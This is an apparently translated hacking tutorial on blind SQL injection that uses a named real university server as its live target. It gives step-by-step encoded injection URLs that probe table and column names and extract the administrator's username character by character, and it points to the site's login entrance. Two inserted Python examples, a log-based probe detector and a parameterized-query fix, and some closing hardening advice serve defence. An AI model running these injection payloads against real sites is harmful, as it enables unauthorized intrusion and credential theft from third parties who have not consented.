Author: Ice Race
I don't remember when I wrote this; I dug it out while sorting through my computer these days, looked it over, and thought it still had some value.
==========
Description: if you reproduce this, please credit Ice Race. Also, so that the analysis is more realistic and readers understand each step better, the injection site analyzed here in real time is a real one: http://202.114.71.194/ (Wuhan University Environmental Law Institute). For this reason I hope nobody damages it; this is only for learning. If anything unexpected happens, it has nothing to do with me.
==========
Today I mainly analyze SQL injection, but along the way I will also cover how to tell that a site runs on Access, and give some website security recommendations. Now that many websites sit behind a firewall, if the programmer pays a little attention and the administrator is responsible, it becomes very hard for us to exploit these vulnerabilities. Or, as the saying goes: as long as you defend, it takes a while to get in, and the hacker may not have that much patience for you. Heh, you'll see... Briefly, injection means the attacker submits some code in IE; when the program joins that code into its query, it becomes part of the logic the running program executes, and that is the attack. I am talking about SQL today, so you need some SQL background. Also, we rely on the error messages that come back to make our judgments, so you must set up IE first: Tools -> Internet Options -> Advanced -> uncheck "Show friendly HTTP error messages". Then the page will return the real error text.
First of all, as you may know, the first thing I try is a single quote. Take a look at the homepage of http://202.114.71.194/ and open a page; I open http://202.114.71.194/show.asp?id=763' and it returns the following:
--------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/show.asp, line 47
--------------------------------------------------
Perhaps someone will say I'm lucky that this website can be injected. Heh, I am injecting it; in fact I had already found that it has this vulnerability, and today I am using it to demonstrate for everyone.
----------- The programmer's big mistake.
If another website returned something like this instead:
--------------------------------------------------
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID = 56''.
/SHOWDETAIL.ASP, line 8
--------------------------------------------------
then that site uses an Access database.
At this step we also generally try the following two requests: http://202.114.71.194/show.asp?id=763 and 1=1 and http://202.114.71.194/show.asp?id=763%20and%201=2. The first condition obviously holds, so it returns the same page as http://202.114.71.194/show.asp?id=763; the second of course does not hold, so it does not return that page. (The %20 here, in case a newbie doesn't know, is a space.) Second step: from the first step we know the site uses ASP with SQL Server, so naturally we go looking for the administrator's username and password. That is what I am after, but what are the column names for the username and password, and how do we learn the table name? Mainly by looking at the source files, and by guessing; most of them follow conventions. At the same time I have to find the management entrance, and there are all sorts of ways to find it. You can guess, for example login.asp, admin.asp, ad_login.asp, and so on. I guessed this website's entrance is http://202.114.71.194/login.as which is right in front of your eyes. Or you can check whether there is a management link on the site's homepage, so you don't even have to guess.
------- The administrator's big mistake.
At this point we also have to find out which table holds the administrators. Try http://202.114.71.194/show.asp?id=763%20and%20exists%20(select%20*%20from%20login). Here you can change login to user, admin, and so on; if the same page comes back, you have guessed it. That page is http://202.114.71.194/show.asp?id=763.
Third step: with the table name in hand, we naturally guess the columns next. Usually there are 3 columns: ID number, username, password. Try http://202.114.71.194/show.asp?id=763%20and%20exists%20(select%20id%20from%20login), http://202.114.71.194/show.asp?id=763%20and%20exists%20(select%20username%20from%20login), http://202.114.71.194/show.asp?id=763%20and%20exists%20(select%20password%20from%20login). After N submissions I finally found (being a hacker isn't easy, it's hard work) that the username column is user and the password column is password. Fourth step: guess which ID numbers exist in this table. The statement is http://202.114.71.194/show.asp?id=763%20and%20exists%20(select%20id%20from%20login%20where%20id=1). Here change id=1 to id=2, 3, 4, 5... and keep trying.
Fifth step: guess the length of the username: http://202.114.71.194/show.asp?id=763%20and%20exists%20(select%20id%20from%20login%20where%20len(user)=1%20and%20id=1). Here you try len(user)=1, 2, 3, 4... until the correct page comes back. This step is easy, at most 10 tries; this time I found the length is 7 (for the user with id=1, of course).
Sixth step: guess each character that makes up the username. Heh, if it isn't letters but Chinese characters, that is miserable. http://202.114.71.194/show.asp?id=763%20and%20exists(select%20id%20from%20login%20where%20asc(mid(user,1,1))>110%20and%20id=1). Sometimes you can also try the following:
http://202.114.71.194/show.asp?id=763%20and%20exists(select%20id%20from%20login%20where%20left(user,1)=a). Here the main thing is to test left(user,1)=a, b, c, d, ... one by one. That is all I can think of right now. If you have a better way to try this step, please tell me and teach me; we can learn from each other (oh, if you'd take me as an apprentice, I would really be willing).
In the last step, change user to password and the password comes out the same way. I did not actually try it, since the workload is large and this article is only a simple introduction to injection.
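From the defender's side, every probe in the walkthrough above leaves a recognisable trace in the web server's access log: a stray quote, "and 1=1"/"and 1=2" pairs, "exists(select", "len(" and "asc(mid(". The script below is an added example, not part of the original post, that URL-decodes constructed W3C-style log lines and flags those patterns. The log format (date, time, client, method, stem, query, status) and the sample lines are constructed for this example; the client address 10.0.0.5 and the entries are placeholders.

```python
"""Detect boolean-based blind SQL injection probes in web server access logs.

Added example (not from the original post). The log lines below are
constructed to resemble IIS W3C-style entries; the client addresses and
request details are placeholders, not real traffic.
"""
import re
from urllib.parse import unquote_plus

# Each pattern corresponds to one probe shape used in the walkthrough.
PROBE_PATTERNS = {
    "quote_error_test": re.compile(r"=[^&\s]*'(?:\s|&|$)"),
    "boolean_tautology": re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I),
    "exists_subselect": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "length_probe": re.compile(r"\blen\s*\(", re.I),
    "char_probe": re.compile(r"\b(?:asc\s*\(\s*mid|left)\s*\(", re.I),
}

# Constructed sample log: fields are date time client method stem query status.
SAMPLE_LOG = """\
2004-03-01 10:00:01 10.0.0.5 GET /show.asp id=763 200
2004-03-01 10:00:07 10.0.0.5 GET /show.asp id=763' 500
2004-03-01 10:00:15 10.0.0.5 GET /show.asp id=763%20and%201=1 200
2004-03-01 10:00:16 10.0.0.5 GET /show.asp id=763%20and%201=2 200
2004-03-01 10:01:02 10.0.0.5 GET /show.asp id=763%20and%20exists%20(select%20*%20from%20login) 200
2004-03-01 10:02:40 10.0.0.5 GET /show.asp id=763%20and%20exists%20(select%20id%20from%20login%20where%20len(user)=7%20and%20id=1) 200
2004-03-01 10:03:11 10.0.0.5 GET /show.asp id=763%20and%20exists(select%20id%20from%20login%20where%20asc(mid(user,1,1))>110%20and%20id=1) 200
2004-03-01 10:05:00 10.0.0.9 GET /show.asp id=764 200
"""


def parse_line(line):
    """Split one log line into a record; return None for malformed lines."""
    fields = line.split()
    if len(fields) != 7:
        return None
    date, time, client, method, stem, query, status = fields
    # Decode %20 etc. so the patterns see the SQL the server saw.
    return {"time": f"{date} {time}", "client": client, "method": method,
            "stem": stem, "query": unquote_plus(query), "status": int(status)}


def classify(query):
    """Return the names of all probe patterns matching a decoded query string."""
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(query)]


def scan(log_text):
    """Return (client, stem, matched_patterns) for every suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["query"])
        if hits:
            alerts.append((rec["client"], rec["stem"], hits))
    return alerts


def suspicious_clients(log_text, threshold=3):
    """Clients with at least `threshold` flagged requests (guessing is iterative)."""
    counts = {}
    for client, _, _ in scan(log_text):
        counts[client] = counts.get(client, 0) + 1
    return {client for client, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for client, stem, hits in scan(SAMPLE_LOG):
        print(f"{client} {stem}: {', '.join(hits)}")
    print("clients to investigate:", suspicious_clients(SAMPLE_LOG))
```

The threshold matters more than any single signature: one "and 1=1" can be noise, but a client that walks from a quote test through exists/len/asc probes within minutes is following exactly the procedure the post describes, and the 500 response to the quote test is the error leak the IE setting above makes visible.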
Below I will briefly say how to prevent problems like this.
1. When programming, filter out single quotes and other special symbols, and if possible limit the length of what users can input through IE. This can be implemented by the programmer or by a firewall.
2. The administrator's part: change the entrance to something with no pattern and hide it, so the attacker cannot find where to inject. Above all, don't be so obvious as to put the management entrance on the home page; that is plainly telling the attacker "come and attack me".
3. If possible, delete the management entry page altogether. It is a bit inconvenient, but you can upload it when you need to use it. That way there is no entrance at all.
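Recommendation 1 above is what the vulnerable show.asp lacks: the id value is concatenated straight into the SQL text, which is why "and 1=1" and "and 1=2" return different pages and a lone quote returns a driver error. The following is an added example, not code from the original post or the site, reproducing that behaviour against a constructed in-memory SQLite table and contrasting it with the fix: validate the id as digits, then bind it as a query parameter (parameter binding is not mentioned on the page; it is the standard complement to filtering). The table name, rows and helper names are constructed for this example.

```python
"""Vulnerable string-built query vs. validated, parameterized query.

Added example (not code from the original post). Uses an in-memory SQLite
database with a constructed 'articles' table standing in for the site's data.
"""
import sqlite3


def make_db():
    """Build a small constructed dataset."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(763, "Article 763"), (764, "Article 764")])
    return conn


def fetch_vulnerable(conn, raw_id):
    """The show.asp pattern: the raw query-string value becomes part of the SQL."""
    sql = "SELECT title FROM articles WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def validate_id(raw_id):
    """Recommendation 1: allow only a short run of digits, nothing else."""
    if not raw_id.isdigit() or len(raw_id) > 9:
        raise ValueError("invalid id")
    return int(raw_id)


def fetch_safe(conn, raw_id):
    """Bind the value as a parameter; quotes or keywords in it cannot alter the query."""
    sql = "SELECT title FROM articles WHERE id=?"
    return [row[0] for row in conn.execute(sql, (validate_id(raw_id),))]


def demo():
    """Run both versions against the same inputs and collect the outcomes."""
    conn = make_db()
    results = {}
    # The boolean oracle: a true condition returns the row, a false one nothing.
    results["vuln_true"] = fetch_vulnerable(conn, "763 and 1=1")
    results["vuln_false"] = fetch_vulnerable(conn, "763 and 1=2")
    # The single-quote test: an unterminated string literal raises a driver error,
    # the same kind of message the page shows from SQL Server.
    try:
        fetch_vulnerable(conn, "763'")
        results["vuln_quote"] = "no error"
    except sqlite3.OperationalError:
        results["vuln_quote"] = "error"
    # Hardened version: legitimate ids work, anything else is rejected up front.
    results["safe_ok"] = fetch_safe(conn, "763")
    try:
        fetch_safe(conn, "763 and 1=1")
        results["safe_probe"] = "accepted"
    except ValueError:
        results["safe_probe"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Even with the digit check removed, the parameterized query would treat "763 and 1=1" as a single value to compare against the integer column rather than as SQL, so the two defences are independent: validation stops the probe at the door, and binding makes sure a missed filter still cannot change the query's structure.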
OK, I have said a lot; that should be it. If anything in this article is wrong, I hope you will point it out. My email is animeihong@sina.com. One more thing about the website used in this article: to stop readers from using it to attack the site, I sometimes changed the correct results of the attempts. I hope you don't go and damage it.